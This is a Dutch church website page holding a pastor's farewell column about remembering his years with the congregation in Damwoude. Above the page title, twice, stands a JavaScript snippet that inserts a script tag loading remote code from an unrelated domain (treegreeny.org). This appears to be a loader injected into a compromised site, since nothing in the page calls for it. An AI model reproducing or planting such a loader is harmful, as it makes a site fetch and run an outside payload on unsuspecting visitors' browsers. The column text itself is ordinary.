;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Daar heb ik gewerkt! - PKN Damwâld

Daar heb ik gewerkt!

Gepubliceerd op: zaterdag 25 maart 2017

Als we op de snelweg rijden, dan kom ik soms bekende vrachtauto’s tegen. Een trekker van St. vd. Brink uit Ermelo met een oplegger van Boni Supermarketen aan de schotel. Dan zeg ik tegen de kinderen ‘daar heb ik vroeger nog gewerkt’.
Ik heb best nog wel wat herinneringen aan die tijd dat ik daar werkte. Bepaalde gebeurtenissen en bepaalde personen blijven je wel bij. Ook na 20 jaar.
Maar aan de andere kant is er ook weer veel dat vergeten wordt. Je kunt als mens nu eenmaal niet alles onthouden. Dat past allemaal niet in ons geheugen. En bovendien worden oude herinneringen verdrongen door nieuwe ervaringen. Pas als je weer iets bekends tegen komt uit het verleden, worden de herinneringen weer geactiveerd.
Ik denk dat het met ons ook zo zal gaan. Op dit moment zitten we nog volop in het afscheid. De afgelopen zes jaar passeren nogmaals de revue. Veel dingen liggen toch nog wel vers in het geheugen. De herinneringen worden volop geactiveerd.
Dat zal niet zo blijven! Straks komen er weer nieuwe indrukken en belevenissen. Als predikant word ik verbonden aan een andere gemeente. Daarnaast ga ik ook nog ander werk doen. U begrijpt: vele nieuwe ervaringen zal ik opdoen.
De gemeente gaat ook verder. Een traject van beroeping is gestart en dat zal hopelijk leiden tot de komst van een nieuwe predikant in de gemeente. Dat geeft ook weer nieuwe impulsen. Daarmee zal het verleden vervagen.
In Hebreeën 13 vers 7 staat de oproep ‘gedenk uw voorgangers’. Dat betekent niet dat u alles van mij moet onthouden. Dat gaat niet lukken. Dat hoeft ook niet. Het gaat erom dat u bedenkt welke weg ik u heb gewezen. De weg van Jezus Christus, de weg van het geloof. Ik zal u gedenken. Uw geloof en uw trouw, de liefde binnen de gemeente voor mij als predikant en ons als gezin.
Ik zal niet alles van u onthouden. Maar ik weet zeker: elke keer als een auto van Feenstra voorbij zie komen en ik lees op de trailer in die grote letters FEENSTRA-DAMWOUDE. Dan denk ik ‘daar heb ik gewerkt’. Niet bij Feenstra, maar in Damwoude.
Dan zeggen we tegen elkaar ‘wat was dat een mooie tijd!’.

Columnist:Ds. G. Timmer

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns